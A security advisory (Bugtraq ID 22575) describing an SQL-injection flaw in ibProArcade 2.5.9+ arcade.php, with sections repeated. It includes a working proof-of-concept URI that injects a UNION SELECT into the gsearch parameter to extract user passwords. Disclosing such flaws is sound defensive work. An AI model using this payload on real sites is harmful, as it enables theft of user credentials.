ibProArcade Arcade.PHP SQL Injection Vulnerability
BID:22575
Info
ibProArcade Arcade.PHP SQL Injection Vulnerability
| Bugtraq ID: | 22575 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 15 2007 12:00AM |
| Updated: | Feb 15 2007 06:57PM |
| Credit: | sp00k is credited with the discovery of this vulnerability. |
| Vulnerable: |
ibProArcade ibProArcade 2.5.9+ |
| Not Vulnerable: | |
Discussion
ibProArcade Arcade.PHP SQL Injection Vulnerability
ibProArcade is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue affects version 2.5.9+; other versions may also be vulnerable.
ibProArcade is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue affects version 2.5.9+; other versions may also be vulnerable.
Exploit / POC
ibProArcade Arcade.PHP SQL Injection Vulnerability
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/forum/arcade.php?act=Arcade%20search_type=0&gsearch=' union select password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from user where userid = USERID /*
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/forum/arcade.php?act=Arcade%20search_type=0&gsearch=' union select password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from user where userid = USERID /*
Solution / Fix
ibProArcade Arcade.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].